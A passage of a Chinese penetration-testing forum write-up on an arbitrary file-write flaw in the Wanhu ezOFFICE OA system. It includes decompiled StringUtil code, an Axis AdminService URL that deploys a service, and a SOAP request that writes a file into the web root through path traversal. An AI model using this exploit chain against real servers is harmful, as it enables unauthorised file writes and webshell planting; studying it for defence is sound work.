aKiLC9AAAAAAAAqiO35p3KlL9xlD5unBIvjIuLi5NDCicxplCRUbKtIMmu04U8V6HJzIxE3VFC4VDe/M7GS9KCDwtVOJX5eV3N5wEAAAAAALjALLdMc2aETKk0rwjzwdVO7jAzwq5f4T6r4y62GREzzcwixhVsuzDQYf6ZBTqUNK9prjbjirm/q3EXvF44piIVehZn7yMAAAAAAIA77c7MNNNWrzazLRYPzei9vFOZ8zcOeSiZD662H1Q4FsWtLrat0GiH98LuWUrIg5mZM80Iu/Y403542Z7X1fcVAAAAAAAgT16e6fjvv5f48swRdZIi4mZqdWa6EgsvopNFH6+4uDzMiJipxwv16d0vLv/PZsYKfWxxHCdF6OW3x9pvQd47Qavj5Cauxi2Fti645C1Djw2dpWQWsgEAAAAAALik4vNOFZC/iVutxN72h+WFjX1aBVNVxn93XtiFyTHPNXN870JH7YVp7NP2iS6HXZjs5n9aYwveIKyPBhaz61TZntf19xUAAAAAAMAV/p6a6Mv/SqFhzlqs2lkgf2NmjNPQyBX2XZweM2c/zogYqD5O7m9LzrjjmDpX45bCWrezi8nMGKeY8HEyIuL08tPjNba30zcKAAAAAAAATlR83qn8+ZvI1qFOroaqYKrKzNgpq6SwUua51Luf4pSYfyycrUCqcCFUUfOHqdAj2beW6Xldf18BAAAAAABc4YYdnOK02jRlmplaPfPiyi8zY5yujpyl0izWysjIsH9VfJBuUeq4eycoc2acCi+aMzMSNS4
<h3 blockindex=56>StringUtil任意文件写</h3>
<p blockindex=57>网上还存在一种方法:使用<code>com.whir.ezoffice.ezform.util.StringUtil</code>这个类写文件</p>
<p blockindex=58><img src=data:image/png;base64,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
<p blockindex=59>存在无参构造方法满足service条件</p>
<pre blockindex=60><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>private</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>writeToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
BufferedOutputStream outStream = <span class=hljs-keyword>null</span>;
OutputStreamWriter writer = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>try</span> {
String dirPath = <span class=hljs-string>""</span>;
<span class=hljs-keyword>if</span> (fileName.lastIndexOf(<span class=hljs-string>"/"</span>) != -<span class=hljs-number>1</span>) {
dirPath = fileName.substring(<span class=hljs-number>0</span>, fileName.lastIndexOf(<span class=hljs-string>"/"</span>));
}
File dir = <span class=hljs-keyword>new</span> File(dirPath);
<span class=hljs-keyword>if</span> (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> IOException(<span class=hljs-string>"create directory '"</span> + dirPath + <span class=hljs-string>"' failed!"</span>);
}
outStream = <span class=hljs-keyword>new</span> BufferedOutputStream(<span class=hljs-keyword>new</span> FileOutputStream(fileName, <span class=hljs-keyword>true</span>));
writer = <span class=hljs-keyword>new</span> OutputStreamWriter(outStream);
writer.write(content);
} <span class=hljs-keyword>catch</span> (IOException var9) {
<span class=hljs-keyword>throw</span> var9;
} <span class=hljs-keyword>finally</span> {
<span class=hljs-keyword>if</span> (writer != <span class=hljs-keyword>null</span>) {
writer.close();
}
<span class=hljs-keyword>if</span> (outStream != <span class=hljs-keyword>null</span>) {
outStream.close();
}
}
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content);
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printlnToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content + <span class=hljs-string>"\n"</span>);
}
</code></pre>
<p blockindex=61>可以通过 printToFile 方法任意文件写,内容以及文件名均可控</p>
<pre blockindex=62><code class="hljs language-php">http:<span class=hljs-comment>//127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment</span>
</code></pre>
<p blockindex=63>网上众多的 freemarkerQa 服务均是调用的该类</p>
<pre blockindex=64><code class="hljs language-php">POST /defaultroot/./services/freemarkerQa HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
SOAPAction:
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
Content-Length: <span class=hljs-number>606</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:util=<span class=hljs-string>"http://util.ezform.ezoffice.whir.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;
&lt;fileName xsi:type=<span class=hljs-string>"soapenc:string"</span> xmlns:soapenc=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;../server/oa/deploy/defaultroot.war/<span class=hljs-number>1</span>.txt&lt;/fileName&gt;
&lt;content xsi:type=<span class=hljs-string>"soapenc:string"</span>&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=65><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABCwAAAFKCAYAAADWh85wAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeXyV5Z3//9d1L2fNQgJhDTsKX1zQAlUrNqho3eji76tlnI7W6jxsq9Xaamld5jdTO7ZqdWasrbV1aaetpaUjrSjgMgKKCwVUXMKiIntIAglZzn7u+/r+Ec4xIcu5A0lOQj7Px4OH5px7uc5JIOd+35/rcymtNZ2KxcqbnfjntTbng56E1qOBgs53EN2j8j0AIYQQQgghhBCirzSj1F5gm1LG0gLTfJpgcHdnG6uOAotodP9o17X/Dc3XtNZGb452cJPAQgghhBBCCCHE4KSUclH6ccNI/f+h0LC97Z4/PLB49dVXP6+1/oPWWiopxIDm8/kwTRPTNAEwDAOlJCQSQggx+Git0Vrjui6u65JOp0mlUvkelhBCCAGAUqpZKfWPZ5555tNtHm8dWHz00Uc3Av8hVRVioDIMA5/Ph8/nk3BCCCGE6ILWmmQySSKRoMspwkIIIUQfUEq5wM2TJ09+MPtY5hdUdXX155VSSySsEAOV3+/H5/NhGPIjLIQQQnjlum42uBBCCCHySSnlaq2/NGLEiKfhUGCxf//+0a7rbpFpIGIgUkoRCoWwLCvfQxFCCCEGrFQqRSwWk2oLIYQQeaWUajYMY+qwYcP2GgBa63+TsEIMRIZhUFBQIGGFEEIIcZRs26agoEAqFYUQQuSV1rpAa/1vAOrAgQPl6XR6h0wFEQONYRiEw2H5YCWEEEL0INd1iUQiuK6b76EIIYQYpJRSrmVZ441kMvl5CSvEQBQKhSSsEEIIIXqYYRgEg8F8D0MIIcQgprU2ksnk5w3TNOfnezBCdFcgEMguVyqEEEKInmVZFn6/P9/DEEIIMYiZpjnfcBxnUr4HIkR3ZJYuFUIIIUTv8fv9UskohBAibxzHmWQYhjE63wMRojt8Ph9KqXwPQwghhDimKaXkBoEQQoi8MQxjtHWsrw6ilMIwDEzTzE4hcBwH13VxHEeW7hpglFJSoiqEEEL0Eb/fTzwez/cwhBBCDEJa64J+uRakdl3SThrXcdDazXapNgwDpQxMy8IwzJxlipZldXg3PrOf1ppEIoHjOL3zQkSPs20730MQQgghBhXbtkmlUvkehhBCiEGoXwQWWmtcxyGZjJNKJnGcdDZsMA0Dy7Q+2c51iEVipNNpTMvCZ/uxfT5M65ML2UwJo2W17JdYtIjks8/irF8HgDlrNr6LL8a/YAGBQIB0Ok0ymZRqiwFAGm0KIYQQfcs0TQkshBBC5IXat29f3q7SXdclnUqQSMTRrksgECCZTJJMJnFdF6UUWutshUTm/7XWGIaB3+/Dtn3E43GUYeD3B7B9ASzLIhAI4O7cReTbN5Fc/VKH5/dVnEP4P/8LY9xY4vG4VFoMAOFwOBtECSGEEKL3pdNpIpFIvochhBBiEMpbYJFMxEkkYvhsm2QySSKRaBnQoUDCi9bbBv1+LJ+PdDrN8JFjAGi44ALS697o8hjWaWdQvGw5ANFoVKos+rnCwkLpWC6EEEL0Idd1aWpqyvcwhBBCDEJ9fuXnOg6R5kZcJ4XrODQ1NZFMJg896z2sANpUX8STSZqamvAdasgY//3vc4YVAOm1rxP//e8BmW4wEEhYIYQQQvQtWZlLCCFEvvTp1V8qmSAaacQyFc3Nzdn5kJmQQmsXrXWbP67rtvnT0fOtj2FaLctvpZ5a4n1ch7aVi2EhhBBCiLYksBBCCJEvfdYMIBGPkUzEcF23w+WxWvenyDBN89DKIJ/0sMgsR5pxeJ+LYDAIQPq9dzyPLbOtVFgIIYQQQgghhBD9Q58EFvF4jFSiZWWPdNqhdVCfCShahxW2beM4Do2NjTQ2NpJKtEwZ8fv9FBYXUlhYhGEYpFKpdkGHdqUHhRBCCCGEEEIIMdD1emCRSiZIJ1tW4HCc9mFFpjLCdd1shcOOHTvYsWMHBw82kE6n24Qatm1TOmQIEyaMZ9SYMWitcRwHwzDQWhONNlPsK8U68WSSq//X0xitE08GkFVCRMd0y7QjlEwZEkIIIfqz22+/HcMwuOuuu/I9FCGEED2gVwML13GIRppQSpFKpdrMgWxdGaG1xrIsotEob7/9NtXVNRiGgWma+Hy+NvtoranZv599NTWMHr2HU06Zgd/vJ51OYxhGdrUR/zVXew4s/NdcDfTvwOKZZ57hN7/5DWvWrOnR45511llcffXVXHTRRT163IHKaDgIuKAUOhRGHTyAtWI5oHA/dxFOOIAOFaNSCUgl0aHCvI01EolQU1PjeUnezJQqL41tfT4fpaWllJaW4j/UyDYXr3OctdaHqq3S2R40XXFdl0gkQjqd9nR80zQJBAKYpplzTK7rkk6ns9VaXo5t23abqWqdMQwDy7Lw+Xye3hvHcYhEIkQiEU/vC+BpzNDyvbEsC8uyPPXqyfz767Wvz+H/VgshRL5s2rQp30MQQgjRg3o1sGhsPEgwEKCpqanDD+ytw4rm5mbeeO11miIR/H5/9oN45oN7Zv/MB2+lFHv37iUWiXDaGacTCARwHIdYtOXDvu/iS/BVnJsztLA/dxG+iy/JVmr0Rz/84Q/5xS9+0SvHfuWVV3jllVe45ZZbuOWWW3rlHAOFUb0L8/1KqD+AHjUCNWwolJVDcz36f5/G2LwO/dVvoMdOwXz/bZQvRGpsObp4aF7G6zgO0WiUaDTq6WI+8zPu5SI3EAgQDoe7tWpPdwKL1g11c3Ech2Qy6SlUaH1h7mVMruuSSqVIJpM5x6KUyoYgXsIQrXW2aszLe5P5/iQSCc+BhdftDMPIhlVeQoju9vORhsVCCCGEEKI39NqnzEQ8RjDgp6m5+dAjbT+wZ6orMr0oNqxbT3M0it/vb3MXWCnV7sN+5mLH7/dT39DAm+s34Lpu9pjV+/YCEPrJj8EMdDpGFSyg4L6fAnTYCLQ/ePrpp3strGjtpz/9KatWrer18/Rb2sVIpVAvPgN/+y3GL++Ch25HPfNr9AnHo+Z/Eep3Yv7uAcz318Hb61E/+i7We+9jNNTle/RCCCGEEEIIcczplcBCa00k0kQymYTsHVHd5vlMIGFZFps3b+FAfT0+ny8bPHR1RzLzfCa0qK6t5cMPP8K2bbTWJOIxIs1NmMcfz9CafRT8/Jf4LpqPOXwk5vCR+C6aT8HPf0np7t0YY0Z7Lk3PhwcffLDPzvXLX/6yz87VXxjRJsy92zF3foByXLjkCxhXXAPnfxHGTUBXrkatfwqmTETNvxyie1Cv/g9q2lR0sR+19A8YkcZ8vwwhhBBCCCGEOOb0ypSQRDxGQThMQ0NDh8FDJmwwTZPGxkZ27tyJz2dnwwqvMsexbZvt27czfvy4lnnUrqa2Zh+RSDNlw0fiX7AA/4IF7fbXWpNMJj3Pjc+HLVu29Nm5Nm7c2GfnyrtUEqu+FuO5ZejK9RCrBZ8DpYXo0iEwfgocfzbET4dtf4d3/4R7wvmoef8frF2CTs5qCTAW/QLj3b9jhYqgvh531CjcQCjfr04I0Q8sXryYRx99lGuvvZbLLrusx465YsUKdu/eTXl5OY899liPHNeLO+64g3Xr1vHcc8/12TmFEEIIMbj1eGChtSYaacbnszsNHzLVFaZpUl1dQzKZPKqGbYZhEI1G2V9Ty7gJ40kmkxjKIBaNsHvnxwRDYfz+AIFAEBSkU0misRjBYPfm6OdDKpXqs3PV19f32bnyzYhFUB9sQ7/wN7A1TBmHKilEWw4GMZxtr4OtUVNOgU99FnZvhJ2r4ITPo0+Yif74ZdRpV6FLg7B3K8b6ELz4HFz5z+hJk9GBcL5fohB9Zu/evXz961/3tO1//Md/MH369OzXkUiEZcuWZS/Ci4qKmDlzJgsWLGDChAkdHuNI9jl8/x//+MfMmDGjW0HCs88+y4MPPshtt91GRUWF5/16yhNPPMGiRYsoLy9n9uzZNDU19fkYBrO9e/cSi8UYP358tk+OEEIIIXpXj//GTadS2LblqSeE1pq6ugMYeK+
<p blockindex=66>验证成功</p>
<h2 blockindex=67>总结</h2>
<p blockindex=68>实战中很有意思的一个漏洞但网上的poc。。。呃呃</p>
<p blockindex=69>还可以尝试打freemarker、bsh</p>
<p blockindex=70>万户作为老牌oa还是很值得去学习研究的</p>
<p blockindex=71>参考:<br>
<a href=https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ>万户rce</a><br>
<a href=https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg>实战 | 万户GeneralWeb组合Bypass Rasp</a></p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-09-29 10:00:01
</li>
<li>阅读 ( 133 )</li>
<li>分类:<a href=https://forum.butian.net/community/Pen_Testing target=_blank rel="noopenner noreferrer">渗透测试</a>
</li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=3784 data-support_num=0> 0 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=3784> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mt-20 mb-20">
<div class=col-md-12>
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-3784 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571><a href="https://www.cnzz.com/stat/website.php?web_id=1279782571" target=_blank title=站长统计>站长统计</a></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
Reference in New Issue Copy Permalink